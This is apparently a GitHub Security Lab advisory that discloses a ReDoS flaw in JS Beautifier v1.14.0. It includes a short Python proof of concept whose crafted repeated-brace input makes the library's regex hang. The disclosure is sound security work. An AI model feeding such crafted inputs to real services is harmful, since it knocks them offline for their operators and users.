skip to content
Back to GitHub.com
Home Bounties Research Advisories Get Involved Events
December 10, 2021

GHSL-2021-113: ReDoS (Regular Expression Denial of Service) in JS Beautifier

GitHub Security Lab

Coordinated Disclosure Timeline

Summary

JS Beautifier contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).

Product

JS Beautifier

Tested Version

v1.14.0

Details

ReDoS

ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions which can perform extremely badly when run on a crafted input string.

This vulnerability was found using a CodeQL query which identifies inefficient regular expressions. You can see the results of the query on JS Beautifier by following this link.

Vulnerability

The vulnerable regular expression is here.

Please follow these steps to reproduce the issue:

import jsbeautifier

str = '''
return <- {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {>
'''

print(jsbeautifier.beautify(str, {'e4x': True}))

Impact

This issue may lead to a denial of service.

Credit

This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-113 in any communication regarding this issue.